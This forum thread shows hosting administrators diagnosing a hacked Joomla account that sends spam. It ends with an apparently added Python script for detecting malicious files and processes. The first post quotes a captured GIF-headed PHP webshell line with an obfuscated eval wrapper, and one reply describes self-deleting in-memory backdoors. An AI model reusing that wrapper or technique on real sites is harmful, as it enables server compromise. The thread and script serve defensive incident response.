
Checking strange activity on account

Discussion in 'Security' started by madpato, Oct 14, 2013.

  1. madpato

    madpato Active Member

    Joined:
    May 30, 2008
    Messages:
    44
    Likes Received:
    1
    Trophy Points:
    58
    Hello

    I have a user who I believe has been hacked and is sending spam. I have CSF and it let me know which file was doing this; I got rid of it (yesterday), but today more PHP files showed up in the same folder, so I assume this is not over. I even got some GIF files with strange code like this:

    Code:
    GIF89aGbkht
    <?php eval(gzinflate(str_rot13(base64_decode('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')))); ?>
    Now I want to know where I can look to see the origin of this. I tried the FTP logs and found nothing, and /var/log/messages has nothing regarding the location (or even mentioning the user account).
    What I do know is that this user has an old Joomla install, which I know for a fact is probably the reason for this. What I need to know is a server-side solution to stop the creation of those files. Maybe changing the permissions of folders?

    Any ideas? Thanks.
     
  2. quietFinn

    quietFinn Well-Known Member

    Joined:
    Feb 4, 2006
    Messages:
    998
    Likes Received:
    11
    Trophy Points:
    168
    Location:
    Finland
    cPanel Access Level:
    Root Administrator
    You should check that account's access logs:
    /home/CPANELUSERNAME/access_logs
     
  3. madpato

    madpato Active Member

    Joined:
    May 30, 2008
    Messages:
    44
    Likes Received:
    1
    Trophy Points:
    58
    Hi

    I'm afraid that directory is empty. Maybe I have something disabled that prevents the log from appearing?
     
  4. quizknows

    quizknows Well-Known Member

    Joined:
    Oct 20, 2009
    Messages:
    1,010
    Likes Received:
    87
    Trophy Points:
    78
    cPanel Access Level:
    DataCenter Provider
    Check /usr/local/apache/domlogs

    However, they need to update / patch their software. No amount of server-side security can make up for users running hackable applications. Do not allow people to run vulnerable applications on your server. A good modsecurity ruleset can stop a lot of hacks, but it is not foolproof.

    If the file in question is in public_html/images/stories/ or public_html/tmp/, they probably have a hackable com_jce component. Check the date on the files inside public_html/components/com_jce/. If they are more than a year or two old, that is the easiest way for an attacker to upload that code to a Joomla site.
     
  5. cPanelMichael

    cPanelMichael Forums Analyst
    Staff Member

    Joined:
    Apr 11, 2011
    Messages:
    43,711
    Likes Received:
    1,791
    Trophy Points:
    363
    cPanel Access Level:
    Root Administrator
    Hello :)

    Also, check to see if any of the directories within this account are using insecure permissions (e.g. 0777). It's possible the scripts are uploaded through a Joomla plugin that allows uploads of this nature.

    Thank you.
     
  6. sehh

    sehh Well-Known Member

    Joined:
    Feb 11, 2006
    Messages:
    579
    Likes Received:
    5
    Trophy Points:
    168
    Location:
    Europe
    There is another cool way they use to do this, once they compromise an account, they upload a file, execute it and delete it, while leaving the process alive and kicking in memory!

    Thus, there is no file for you to find; it's just not there because it deletes itself.

    Once this process is started, the file will open a TCP port and listen for remote commands, execute code, upload files in tmp directories, send information about the server to a remote listener, so on and so forth.

    So check the running processes, I've seen them use process names like "mysql" and similar ones.

    I found their trick quite effective and imaginative! :)
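    The checks suggested in the replies above (image files carrying PHP code as in the first post, 0777 directories, and processes whose executable was deleted) can be scripted. The following is an added example, not code from cPanel, CSF or any forum member; the helper names and the paths it walks are assumptions.

```python
#!/usr/bin/env python3
"""Triage helper for the symptoms in this thread (constructed example):
flags image files that carry PHP code, world-writable directories, and
running processes whose on-disk executable has been deleted."""
import os
import re
import stat

# An image header followed by a PHP open tag is the polyglot from the first
# post: an upload filter sees a GIF, the web server may execute it as PHP.
IMAGE_MAGIC = (b"GIF87a", b"GIF89a", b"\x89PNG\r\n\x1a\n", b"\xff\xd8\xff")
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def is_image_php_polyglot(data: bytes) -> bool:
    """True when bytes start like an image but contain a PHP open tag."""
    return data.startswith(IMAGE_MAGIC) and PHP_TAG.search(data) is not None


def is_world_writable_dir(mode: int) -> bool:
    """True for directory modes such as 0777 that let any local user write."""
    return stat.S_ISDIR(mode) and bool(mode & stat.S_IWOTH)


def exe_is_deleted(link_target: str) -> bool:
    """/proc/<pid>/exe reads '<path> (deleted)' once the binary is unlinked."""
    return link_target.endswith(" (deleted)")


def scan_home(root: str, max_read: int = 65536) -> dict:
    """Walk an account's home (e.g. /home/USER) and collect paths to review."""
    findings = {"polyglots": [], "world_writable": []}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames:
            path = os.path.join(dirpath, name)
            if is_world_writable_dir(os.lstat(path).st_mode):
                findings["world_writable"].append(path)
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:  # only the head is needed
                    if is_image_php_polyglot(fh.read(max_read)):
                        findings["polyglots"].append(path)
            except OSError:
                continue
    return findings


def deleted_exe_processes() -> list:
    """PIDs whose executable is gone from disk (Linux /proc only)."""
    hits = []
    for pid in filter(str.isdigit, os.listdir("/proc")):
        try:
            if exe_is_deleted(os.readlink(f"/proc/{pid}/exe")):
                hits.append(int(pid))
        except OSError:  # process exited, or not ours to inspect
            continue
    return hits
```

Run `scan_home("/home/USER")` as root and compare `deleted_exe_processes()` against `ps`; a hit named like "mysql" but owned by a web account is the case described above.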
     